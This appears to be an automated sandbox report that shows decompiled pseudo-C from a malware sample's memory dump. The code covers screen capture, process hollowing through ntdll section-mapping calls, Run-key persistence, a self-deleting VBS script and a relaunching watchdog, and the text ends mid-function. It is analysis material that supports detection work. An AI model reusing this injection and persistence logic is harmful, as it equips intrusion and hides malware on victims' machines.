                									__eflags = _t179;
                									if(_t179 != 0) {
                										_t232 = _v160 - _v132.yHotspot - _v224;
                										__eflags = _t232;
                										DeleteObject(_v132.hbmColor);
                										DeleteObject(_v132.yHotspot);
                										DrawIcon(_t234, _v164 - _v132.xHotspot - _v228, _t232, _v176);
                										_t219 = _v228;
                										_t223 = _v240;
                									}
                								}
                							}
                							_push( &_v152);
                							_t118 = 0x18;
                							_t119 = GetObjectA(_t219, _t118, ??);
                							__eflags = _t119;
                							if(_t119 == 0) {
                								goto L11;
                							} else {
                								_t122 = _v146 * _v148 & 0x0000ffff;
                								__eflags = _t122 - 1;
                								if(_t122 != 1) {
                									_push(4);
                									_pop(1);
                									_v252 = 1;
                									__eflags = _t122 - 1;
                									if(_t122 <= 1) {
                										L28:
                										__eflags = 1 << 1;
                										_push(0x2eb6edc);
                										L29:
                										_t225 = LocalAlloc(0x40, ??);
                										_t195 = 0x18;
                										_t225->bmiHeader = 0x28;
                										_t225->bmiHeader.biWidth = _v160;
                										_t225->bmiHeader.biHeight = _v156;
                										_t225->bmiHeader.biPlanes = _v148;
                										_t225->bmiHeader.biBitCount = _v146;
                										_t131 = _v252;
                										__eflags = _t131 - _t195;
                										if(_t131 < _t195) {
                											__eflags = 1;
                											_t225->bmiHeader.biClrUsed = 1 << _t131;
                										}
                										_t225->bmiHeader.biCompression = _t225->bmiHeader.biCompression & 0x00000000;
                										_t225->bmiHeader.biClrImportant = _t225->bmiHeader.biClrImportant & 0x00000000;
                										asm("cdq");
                										_t215 = 1;
                										_t137 = (_t225->bmiHeader.biWidth + 8 >> 3) * (_v252 & 0x0000ffff) * _t225->bmiHeader.biHeight;
                										_t225->bmiHeader.biSizeImage = _t137;
                										_t138 = GlobalAlloc(0, _t137);
                										_v244 = _t138;
                										__eflags = _t138;
                										if(_t138 != 0) {
                											__eflags = GetDIBits(_t234, _t219, 0, _t225->bmiHeader.biHeight & 0x0000ffff, _t138, _t225, 0);
                											if(__eflags != 0) {
                												_v252 = 0x4d42;
                												_v250 = _t225->bmiHeader.biSizeImage + _t225->bmiHeader + _t225->bmiHeader.biClrUsed * 4 + 0xe;
                												_v246 = 0;
                												_v242 = _t225->bmiHeader + _t225->bmiHeader.biClrUsed * 4 + 0xe;
                												E004020BF(_t185,  &_v236);
                												E004020BF(_t185,  &_v148);
                												E004024EA(_t185,  &_v236, 1, __eflags,  &_v252, 0xe);
                												L00403356( &_v244);
                												E004024EA(_t185,  &_v248, 1, __eflags, _t225, 0x28);
                												L00403356( &_v256);
                												_t226 = _v296;
                												E004024EA(_t185,  &_v260, 1, __eflags, _t226, _t225->bmiHeader.biSizeImage);
                												L00403356( &_v268);
                												DeleteObject(_t219);
                												GlobalFree(_t226);
                												DeleteDC(_v308);
                												__eflags = _t234 -  *0x4726ac;
                												if(__eflags != 0) {
                													DeleteDC(_t234);
                												}
                												E00402035(_t185, _t185, _t234, __eflags,  &_v156);
                												E00401FB8();
                												E00401FB8();
                												L9:
                												return _t185;
                											}
                											DeleteDC(_v268);
                											DeleteDC(_t234);
                											DeleteObject(_t219);
                											GlobalFree(_v284);
                										} else {
                											DeleteDC(_v240);
                											L12:
                											DeleteDC(_t234);
                											DeleteObject(_t219);
                											L7:
                										}
                										goto L8;
                									}
                									_push(8);
                									_pop(1);
                									_v252 = 1;
                									__eflags = _t122 - 1;
                									if(_t122 <= 1) {
                										goto L28;
                									}
                									_push(0x10);
                									_pop(1);
                									_v252 = 1;
                									__eflags = _t122 - 1;
                									if(_t122 <= 1) {
                										goto L28;
                									}
                									_t214 = 0x18;
                									__eflags = _t122 - _t214;
                									if(_t122 > _t214) {
                										_push(0x20);
                										_pop(1);
                										L27:
                										_v252 = 1;
                										goto L28;
                									}
                									_v252 = _t214;
                									_push(0x28);
                									goto L29;
                								}
                								goto L27;
                							}
                						}
                						L11:
                						DeleteDC(_t223);
                						goto L12;
                					}
                					DeleteDC(_t223);
                					DeleteDC(_t234);
                					DeleteObject(_t219);
                					goto L7;
                				}
                 			}

                APIs
                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417A3D
                • CreateCompatibleDC.GDI32(00000000), ref: 00417A4A
                  • Part of subcall function 00417E84: EnumDisplaySettingsW.USER32 ref: 00417EB4
                • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00417AC0
                • DeleteDC.GDI32(00000000), ref: 00417AD7
                • DeleteDC.GDI32(00000000), ref: 00417ADA
                • DeleteObject.GDI32(00000000), ref: 00417ADD
                • SelectObject.GDI32(00000000,00000000), ref: 00417AFE
                • DeleteDC.GDI32(00000000), ref: 00417B0F
                • DeleteDC.GDI32(00000000), ref: 00417B12
                • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00417B36
                • GetIconInfo.USER32(?,?), ref: 00417B6A
                • DeleteObject.GDI32(?), ref: 00417B99
                • DeleteObject.GDI32(?), ref: 00417BA6
                • DrawIcon.USER32 ref: 00417BB3
                • GetObjectA.GDI32(00000000,00000018,?), ref: 00417BCB
                • LocalAlloc.KERNEL32(00000040,00000001), ref: 00417C3A
                • GlobalAlloc.KERNEL32(00000000,?), ref: 00417CA9
                • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00417CCD
                • DeleteDC.GDI32(?), ref: 00417CE1
                • DeleteDC.GDI32(00000000), ref: 00417CE4
                • DeleteObject.GDI32(00000000), ref: 00417CE7
                • GlobalFree.KERNEL32 ref: 00417CF2
                • DeleteObject.GDI32(00000000), ref: 00417DA6
                • GlobalFree.KERNEL32 ref: 00417DAD
                • DeleteDC.GDI32(?), ref: 00417DBD
                • DeleteDC.GDI32(00000000), ref: 00417DC8
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                • String ID: DISPLAY
                • API String ID: 479521175-865373369
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 57%
                			E00416FDD(intOrPtr __ecx, void __edx) {
                				void* __edi;
                				_Unknown_base(*)()* _t81;
                				int _t87;
                				signed int _t110;
                				int _t117;
                				intOrPtr _t119;
                				int _t122;
                				long _t123;
                				int _t128;
                				void _t141;
                				void* _t145;
                				intOrPtr _t146;
                				intOrPtr _t148;
                				intOrPtr _t154;
                				struct _PROCESS_INFORMATION* _t157;
                				void _t158;
                				intOrPtr _t160;
                				intOrPtr* _t162;
                				intOrPtr* _t164;
                				int _t166;
                				void* _t167;
                				void* _t168;
                
                				_t164 = __edx;
                				_t157 =  *(_t167 + 0x94);
                				 *(_t167 + 0x34) = __edx;
                				 *((intOrPtr*)(_t167 + 0x30)) = __ecx;
                				 *((intOrPtr*)(_t167 + 0x1c)) = 0;
                				while(1) {
                					 *(_t167 + 0x34) = 0;
                					 *(_t167 + 0x18) = 0;
                					 *((intOrPtr*)(_t167 + 0x1c)) = 0;
                					 *((intOrPtr*)(_t167 + 0x20)) = 0;
                					 *0x470d90 = GetProcAddress(GetModuleHandleA("ntdll"), "ZwCreateSection");
                					 *0x470d84 = GetProcAddress(GetModuleHandleA("ntdll"), "ZwMapViewOfSection");
                					 *0x470d88 = GetProcAddress(GetModuleHandleA("ntdll"), "ZwUnmapViewOfSection");
                					_t81 = GetProcAddress(GetModuleHandleA("ntdll"), "ZwClose");
                					 *0x470d8c = _t81;
                					if( *0x470d84 == 0 ||  *0x470d88 == 0 ||  *0x470d90 == 0 || _t81 == 0) {
                						break;
                					}
                					_t160 = 0x44;
                					E00435760(_t157, _t167 + 0x4c, 0, _t160);
                					_t168 = _t167 + 0xc;
                					 *((intOrPtr*)(_t168 + 0x48)) = _t160;
                					E00435760(_t157, _t157, 0, 0x10);
                					_t167 = _t168 + 0xc;
                					if( *_t164 != 0x5a4d) {
                						break;
                					}
                					_t162 =  *((intOrPtr*)(_t164 + 0x3c)) + _t164;
                					if( *_t162 != 0x4550) {
                						break;
                					}
                					_t87 =  *(_t162 + 0x50);
                					 *(_t167 + 0x24) = _t87;
                					 *(_t167 + 0x44) = _t87;
                					 *((intOrPtr*)(_t167 + 0x48)) = 0;
                					 *((intOrPtr*)(_t167 + 0x2c)) =  *((intOrPtr*)(_t162 + 0x34));
                					if(CreateProcessW(0,  *(_t167 + 0x50), 0, 0, 0, 4, 0, 0, _t167 + 0x4c, _t157) == 0) {
                						GetLastError();
                						break;
                					}
                					_t145 = VirtualAlloc(0, 4, 0x1000, 4);
                					 *(_t167 + 0x3c) = _t145;
                					 *_t145 = 0x10007;
                					if(GetThreadContext(_t157->hThread, _t145) == 0 || ReadProcessMemory(_t157->hProcess,  *((intOrPtr*)(_t145 + 0xa4)) + 8, _t167 + 0x34, 4, _t167 + 0x3c) == 0) {
                						L32:
                						VirtualFree(_t145, 0, 0x8000);
                						 *0x470d88(GetCurrentProcess(), _t167 + 0x14);
                						 *0x470d8c( *(_t167 + 0x18));
                						TerminateProcess(_t157->hProcess, 0);
                						break;
                					} else {
                						_push(0);
                						_push(0x8000000);
                						_push(0x40);
                						_push(_t167 + 0x4c);
                						_push(0);
                						_push(0xf001f);
                						_push(_t167 + 0x30);
                						if( *0x470d90() != 0) {
                							goto L32;
                						}
                						_t110 =  !( *(_t162 + 0x16) & 0x0000ffff) & 0x00000001;
                						 *(_t167 + 0x24) = _t110;
                						if(_t110 == 0) {
                							_t141 =  *(_t167 + 0x28);
                							 *(_t167 + 0x18) = _t141;
                							 *0x470d88(_t157->hProcess, _t141);
                						}
                						_push(0x40);
                						_push(0);
                						_push(1);
                						_push(_t167 + 0x24);
                						_push(0);
                						_push(0);
                						_push(0);
                						_push(_t167 + 0x2c);
                						_push(_t157->hProcess);
                						_push( *(_t167 + 0x3c));
                						if( *0x470d84() == 0) {
                							_t117 =  *0x470d84( *(_t167 + 0x3c), GetCurrentProcess(), _t167 + 0x30, 0, 0, 0, _t167 + 0x24, 1, 0, 0x40);
                							__eflags = _t117;
                							if(_t117 != 0) {
                								goto L32;
                							}
                							__eflags =  *(_t167 + 0x24) - _t117;
                							if( *(_t167 + 0x24) != _t117) {
                								 *((intOrPtr*)(_t162 + 0x34)) =  *((intOrPtr*)(_t167 + 0x10));
                							}
                							E004351E0( *((intOrPtr*)(_t167 + 0x1c)), _t164,  *((intOrPtr*)(_t162 + 0x54)));
                							 *(_t167 + 0x3c) =  *(_t167 + 0x3c) & 0x00000000;
                							_t119 =  *((intOrPtr*)(_t164 + 0x3c));
                							_t167 = _t167 + 0xc;
                							__eflags = 0 -  *(_t162 + 6);
                							if(0 >=  *(_t162 + 6)) {
                								L23:
                								__eflags =  *(_t167 + 0x24);
                								_t154 =  *((intOrPtr*)(_t167 + 0x10));
                								if( *(_t167 + 0x24) != 0) {
                									_t129 =  *(_t167 + 0x28);
                									__eflags =  *(_t167 + 0x28) - _t154;
                									if(__eflags != 0) {
                										E004173F1( *((intOrPtr*)(_t167 + 0x1c)), __eflags, _t129, 0, _t154, 0);
                										_t154 =  *((intOrPtr*)(_t167 + 0x20));
                										_t167 = _t167 + 0x10;
                									}
                								}
                								__eflags =  *((intOrPtr*)(_t167 + 0x2c)) - _t154;
                								if( *((intOrPtr*)(_t167 + 0x2c)) == _t154) {
                									L29:
                									 *((intOrPtr*)(_t145 + 0xb0)) =  *((intOrPtr*)(_t162 + 0x28)) + _t154;
                									_t122 = SetThreadContext(_t157->hThread, _t145);
                									__eflags = _t122;
                									if(_t122 == 0) {
                										goto L32;
                									}
                									_t123 = ResumeThread(_t157->hThread);
                									__eflags = _t123 - 0xffffffff;
                									if(_t123 == 0xffffffff) {
                										goto L32;
                									}
                									return 1;
                								} else {
                									_t128 = WriteProcessMemory(_t157->hProcess,  *((intOrPtr*)(_t145 + 0xa4)) + 8, _t167 + 0x18, 4, 0);
                									__eflags = _t128;
                									if(_t128 == 0) {
                										goto L32;
                									}
                									_t154 =  *((intOrPtr*)(_t167 + 0x10));
                									goto L29;
                								}
                							} else {
                								_t158 =  *(_t167 + 0x34);
                								_t146 =  *((intOrPtr*)(_t167 + 0x30));
                								_t166 = _t164 + 0x10c + _t119;
                								__eflags = _t166;
                								do {
                									E004351E0( *((intOrPtr*)(_t166 - 8)) +  *((intOrPtr*)(_t167 + 0x1c)),  *_t166 + _t158,  *((intOrPtr*)(_t166 - 4)));
                									_t166 = _t166 + 0x28;
                									_t167 = _t167 + 0xc;
                									_t146 = _t146 + 1;
                									__eflags = _t146 - ( *(_t162 + 6) & 0x0000ffff);
                								} while (_t146 < ( *(_t162 + 6) & 0x0000ffff));
                								_t157 =  *(_t167 + 0x94);
                								_t145 =  *(_t167 + 0x38);
                								goto L23;
                							}
                						} else {
                							VirtualFree(_t145, 0, 0x8000);
                							 *0x470d8c( *(_t167 + 0x18));
                							TerminateProcess( *_t157, 0);
                							_t148 =  *((intOrPtr*)(_t167 + 0x1c)) + 1;
                							_push(0);
                							 *((intOrPtr*)(_t167 + 0x20)) = _t148;
                							_pop(0);
                							if(_t148 <= 0x64) {
                								continue;
                							}
                							break;
                						}
                					}
                				}
                				return 0;
                 			}

                APIs
                • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00417024
                • GetProcAddress.KERNEL32(00000000), ref: 00417027
                • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00417038
                • GetProcAddress.KERNEL32(00000000), ref: 0041703B
                • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041704C
                • GetProcAddress.KERNEL32(00000000), ref: 0041704F
                • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00417060
                • GetProcAddress.KERNEL32(00000000), ref: 00417063
                • CreateProcessW.KERNEL32 ref: 00417105
                • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041711D
                • GetThreadContext.KERNEL32(?,00000000), ref: 00417133
                • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00417159
                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004171DB
                • TerminateProcess.KERNEL32(?,00000000), ref: 004171EF
                • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041722F
                • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 004172F9
                • SetThreadContext.KERNEL32(?,00000000), ref: 00417316
                • ResumeThread.KERNEL32(?), ref: 00417323
                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041733A
                • GetCurrentProcess.KERNEL32(?), ref: 00417345
                • TerminateProcess.KERNEL32(?,00000000), ref: 00417360
                • GetLastError.KERNEL32 ref: 00417368
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                • API String ID: 4188446516-3035715614
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 98%
                			E0040C5A4() {
                				short _v524;
                				char _v548;
                				char _v572;
                				char _v576;
                				char _v596;
                				char _v600;
                				void* _v604;
                				char _v620;
                				char _v624;
                				void* _v628;
                				char _v644;
                				char _v648;
                				char _v652;
                				char _v668;
                				char _v672;
                				void* _v676;
                				void* _t49;
                				void* _t50;
                				void* _t53;
                				void* _t56;
                				void* _t71;
                				void* _t82;
                				void* _t84;
                				void* _t85;
                				signed char _t123;
                				signed char _t124;
                				void* _t195;
                				void* _t228;
                				void* _t230;
                				void* _t231;
                				void* _t232;
                
                				E00411D93();
                				if( *0x46f9d4 != 0x30) {
                					E0040AE1C();
                				}
                				_t228 =  *0x470d63 - 1; // 0x0
                				if(_t228 == 0) {
                					E004185EF(_t195, _t228);
                				}
                				if( *0x470a85 != 0) {
                					E0041AC0A(E00401EE4(0x472d40), _t195);
                				}
                				_t213 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
                				_t230 =  *0x470b33 - 1; // 0x1
                				if(_t230 == 0) {
                					E00412D0B(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", E00401EE4(0x473208));
                				}
                				_t231 =  *0x470b30 - 1; // 0x1
                				if(_t231 == 0) {
                					E00412D0B(0x80000002, _t213, E00401EE4(0x473208));
                				}
                				_t232 =  *0x470b31 - 1; // 0x0
                				if(_t232 == 0) {
                					E00412D0B(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", E00401EE4(0x473208));
                				}
                				E00435760(0,  &_v524, 0, 0x208);
                				_t49 = E0040245C();
                				_t50 = E00401F8B(0x473280);
                				_t53 = E004129E0(E00401F8B(0x473238), "exepath",  &_v524, 0x208, _t50, _t49);
                				_t233 = _t53;
                				if(_t53 == 0) {
                					GetModuleFileNameW(0,  &_v524, 0x208);
                				}
                				RegDeleteKeyA(0x80000001, E00401F8B(0x473238));
                				_t56 = E00406E2B(_t233);
                				_t234 = _t56;
                				if(_t56 != 0) {
                					SetFileAttributesW(E00401EE4(0x473250), 0x80);
                				}
                				_t123 =  ~(SetFileAttributesW( &_v524, 0x80));
                				asm("sbb bl, bl");
                				E00402FF4(_t123,  &_v548, E0041A7B9( &_v620, E0041A4D3( &_v668)), 0, 0x46a8f0, _t234, L".vbs");
                				E00401EE9();
                				E00401FB8();
                				E004042FD(_t123,  &_v576, E00402FF4(_t123,  &_v672, E0040415E(_t123,  &_v620, _t60, 0x46a8f0, E0043A99F(_t123,  &_v668, _t234, L"Temp")), 0, 0x46a8f0, _t234, "\\"), 0x46a8f0, _t234,  &_v548);
                				E00401EE9();
                				E00401EE9();
                				_t71 = E0040415E(_t123,  &_v672, _t67, 0x46a8f0, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n");
                				_t202 = L"On Error Resume Next\n";
                				E004042DC(_t123,  &_v652, L"On Error Resume Next\n", 0x46a8f0, _t234, _t71);
                				E00401EE9();
                				_t124 = _t123 & 0x00000001;
                				_t235 = _t124;
                				if(_t124 != 0) {
                					_t202 = E004042DC(_t124,  &_v624, L"while fso.FileExists(\"", 0x46a8f0, _t235, E0040415E(_t124,  &_v596, L"On Error Resume Next\n", 0x46a8f0,  &_v524));
                					E0040323D(E00402FF4(_t124,  &_v672, _t98, 0, 0x46a8f0, _t235, L"\")\n"));
                					E00401EE9();
                					E00401EE9();
                					E00401EE9();
                				}
                				E0040323D(E00402FF4(_t124,  &_v600, E00402FF4(_t124,  &_v672, E0040415E(_t124,  &_v620, _t202, 0x46a8f0, L"fso.DeleteFile \""), 0, 0x46a8f0, _t235,  &_v524), 0, 0x46a8f0, _t235, L"\"\n"));
                				E00401EE9();
                				E00401EE9();
                				E00401EE9();
                				_t236 = _t124;
                				if(_t124 != 0) {
                					L004086C6(_t124,  &_v644, 0, 0x46a8f0, L"wend\n");
                				}
                				_t82 = E00406E2B(_t236);
                				_t237 = _t82;
                				if(_t82 != 0) {
                					_t36 =  &_v668; // 0x473250
                					E0040323D(E00402FF4(_t124,  &_v596, E0040AEF6(_t36, L"fso.DeleteFolder \"", 0x46a8f0, 0x473250), 0, 0x46a8f0, _t237, L"\"\n"));
                					E00401EE9();
                					E00401EE9();
                				}
                				L004086C6(_t124,  &_v644, 0, 0x46a8f0, L"fso.DeleteFile(Wscript.ScriptFullName)");
                				_t84 = E00401EE4( &_v576);
                				_t85 = E0040245C();
                				E00401EE4( &_v648);
                				if(E0041AD6A(_t85 + _t85, _t84, 0) != 0) {
                					ShellExecuteW(0, L"open", E00401EE4( &_v572), 0x46a8f0, 0x46a8f0, 0);
                				}
                				ExitProcess(0);
                 			}

                APIs
                  • Part of subcall function 00411D93: TerminateProcess.KERNEL32(00000000,pth_unenc,0040EE0B), ref: 00411DA3
                  • Part of subcall function 00411D93: WaitForSingleObject.KERNEL32(000000FF), ref: 00411DB6
                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,00473238,?,pth_unenc), ref: 0040C6AE
                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C6C1
                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,00473238,?,pth_unenc), ref: 0040C6F1
                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00473238,?,pth_unenc), ref: 0040C700
                  • Part of subcall function 0040AE1C: TerminateThread.KERNEL32(00409880,00000000,pth_unenc,0040C5C1,00473220,00473238,?,pth_unenc), ref: 0040AE2B
                  • Part of subcall function 0040AE1C: UnhookWindowsHookEx.USER32(?), ref: 0040AE3B
                  • Part of subcall function 0040AE1C: TerminateThread.KERNEL32(0040986A,00000000,?,pth_unenc), ref: 0040AE4D
                  • Part of subcall function 0041A4D3: GetCurrentProcessId.KERNEL32(00000000,7476FBB0,00000000,?,?,?,?,0046A8F0,0040C716,.vbs,?,?,?,?,?,00473238), ref: 0041A4FA
                • ShellExecuteW.SHELL32(00000000,open,00000000,0046A8F0,0046A8F0,00000000), ref: 0040C91B
                • ExitProcess.KERNEL32 ref: 0040C922
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                • String ID: ")$.vbs$82G$@-G$On Error Resume Next$P2G$P2G$P2G(PF$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                • API String ID: 3797177996-790292332
                • Opcode ID: 812a73662d2ae2c81f1c773ab16f3723da55641552efd4e9ac92a0c1c4c0f5f1
                • Instruction ID: 6e45ccf0452d088d16b27cf02e05fcd52a39cd31be9773de80b43fbe075aaa7b
                • Opcode Fuzzy Hash: 812a73662d2ae2c81f1c773ab16f3723da55641552efd4e9ac92a0c1c4c0f5f1
                • Instruction Fuzzy Hash: F7817F716043405BC718FB62D8929AF73E9AF90308F10493FB546A71E2EE7C9D49C69E
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 91%
                			E004119B8() {
                				long _v8;
                				char _v32;
                				short _v556;
                				short _v1076;
                				short _v1596;
                				CHAR* _t24;
                				void* _t26;
                				void* _t27;
                				void* _t30;
                				int _t32;
                				long _t38;
                				int _t40;
                				int _t42;
                				long _t51;
                				int _t53;
                				void* _t56;
                				int _t58;
                				void* _t69;
                				int _t71;
                				int _t72;
                				int _t73;
                				long _t74;
                				void* _t112;
                				void* _t114;
                				void* _t116;
                				void* _t119;
                
                				_v8 = _t74;
                				_t24 = E00401F8B(0x473370);
                				_t72 = 0;
                				if(CreateMutexA(0, 1, _t24) != 0) {
                					_t26 = E0040245C();
                					_t27 = E00401F8B(0x473280);
                					_t30 = E004129E0(E00401F8B(0x473238), "exepath",  &_v556, 0x208, _t27, _t26);
                					_t119 = _t119 + 0x14;
                					if(_t30 != 0) {
                						E004020BF(0,  &_v32);
                						_t32 = E0041ADFE( &_v32);
                						_push(0);
                						__eflags = _t32;
                						if(_t32 == 0) {
                							L2:
                							ExitProcess();
                						}
                						CreateFileW( &_v556, 0x80000000, 1, 0, 3, 0x80, ??);
                						_t114 = OpenProcess(0x100000, 0, _v8);
                						WaitForSingleObject(_t114, 0xffffffff);
                						CloseHandle(_t114);
                						_t38 = GetCurrentProcessId();
                						_t40 = E00412B5F(0x473238, E00401F8B(0x473238), "WDH", _t38);
                						__eflags = _t40;
                						if(_t40 == 0) {
                							goto L1;
                						}
                						_t112 = ShellExecuteW;
                						do {
                							_t42 = PathFileExistsW( &_v556);
                							__eflags = _t42;
                							_t43 =  &_v556;
                							if(_t42 != 0) {
                								L13:
                								ShellExecuteW(_t72, L"open", _t43, _t72, _t72, 1);
                								L14:
                								do {
                									_t73 = E00412831(E00401F8B(0x473238), "WD",  &_v8);
                									__eflags = _t73;
                									if(_t73 == 0) {
                										Sleep(0x1f4);
                									} else {
                										E00412C91(E00401F8B(0x473238), __eflags, "WD");
                									}
                									__eflags = _t73;
                								} while (_t73 == 0);
                								goto L19;
                							}
                							_t56 = E0040245C();
                							E00401F8B( &_v32);
                							_t58 = E0041AD6A(_t56,  &_v556, _t72);
                							__eflags = _t58;
                							if(_t58 == 0) {
                								E00435760(_t112,  &_v1596, _t72, 0x208);
                								_t119 = _t119 + 0xc;
                								GetTempPathW(0x104,  &_v1596);
                								GetTempFileNameW( &_v1596, L"temp_", _t72,  &_v1076);
                								lstrcatW( &_v1076, L".exe");
                								_t69 = E0040245C();
                								E00401F8B( &_v32);
                								_t71 = E0041AD6A(_t69,  &_v1076, _t72);
                								__eflags = _t71;
                								if(_t71 == 0) {
                									goto L14;
                								}
                								_t43 =  &_v1076;
                								goto L13;
                							}
                							_t43 =  &_v556;
                							goto L13;
                							L19:
                							_t72 = 0;
                							_t116 = OpenProcess(0x100000, 0, _v8);
                							WaitForSingleObject(_t116, 0xffffffff);
                							CloseHandle(_t116);
                							_t51 = GetCurrentProcessId();
                							_t53 = E00412B5F(0x473238, E00401F8B(0x473238), "WDH", _t51);
                							__eflags = _t53;
                						} while (_t53 != 0);
                						goto L1;
                					}
                					_push(0);
                					goto L2;
                				}
                				L1:
                				_push(1);
                				goto L2;
                 			}

                APIs
                • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,00473298,00000003), ref: 004119D7
                • ExitProcess.KERNEL32(00000000), ref: 004119E3
                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00411A5D
                • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00411A6C
                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00411A77
                • CloseHandle.KERNEL32(00000000), ref: 00411A7E
                • GetCurrentProcessId.KERNEL32 ref: 00411A84
                • PathFileExistsW.SHLWAPI(?), ref: 00411AB5
                • GetTempPathW.KERNEL32(00000104,?), ref: 00411B18
                • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 00411B32
                • lstrcatW.KERNEL32(?,.exe), ref: 00411B44
                  • Part of subcall function 0041AD6A: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,0046A8F0,00000000,00000000,0040C902,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041ADA9
                • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411B84
                • Sleep.KERNEL32(000001F4), ref: 00411BC5
                • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00411BDA
                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00411BE5
                • CloseHandle.KERNEL32(00000000), ref: 00411BEC
                • GetCurrentProcessId.KERNEL32 ref: 00411BF2
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                • String ID: .exe$82G$82G$82G$WDH$exepath$open$p3G$temp_
                • API String ID: 2649220323-3724276308
                • Opcode ID: 36fa0cd5316c0336f567b1fe0e2be110fb0e7f0c24547f9761ebfc999ec6a06b
                • Instruction ID: 22e993795ca5e5f4b94ea2bece14d6f4ece3e8e9738639780bf53f9b9ba412ff
                • Opcode Fuzzy Hash: 36fa0cd5316c0336f567b1fe0e2be110fb0e7f0c24547f9761ebfc999ec6a06b
                • Instruction Fuzzy Hash: D251F871A043157BDB10A7A0AC99EEF336C9B04715F1001BBF905A72D2EF789E858A5D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 92%
                			E0040C307(char __ecx, void* __edx, void* __eflags, WCHAR* _a4, char _a8, char _a12) {
                				char _v24;
                				char _v28;
                				void* _v32;
                				char _v48;
                				char _v49;
                				char _v52;
                				void* _v56;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				void* __ebp;
                				void* _t22;
                				void* _t23;
                				WCHAR* _t28;
                				int _t29;
                				void* _t35;
                				WCHAR* _t43;
                				int _t45;
                				int _t48;
                				WCHAR* _t54;
                				int _t55;
                				void* _t70;
                				void* _t130;
                				void* _t131;
                				void* _t135;
                
                				_t135 =  &_v56;
                				_t130 = __edx;
                				_v49 = __ecx;
                				_t22 = E0043A3D6(__edx);
                				_t139 = _t22;
                				if(_t22 == 0) {
                					_t73 = _a4;
                					_t125 = _v49;
                					_t23 = E0040CF38( &_v24, _v49, _a4);
                					_t131 = 0x473220;
                					E00401EF3(0x473220, _v49, 0x473220, _t23);
                				} else {
                					CreateDirectoryW(E00401EE4(0x473250), 0);
                					_t73 = _a4;
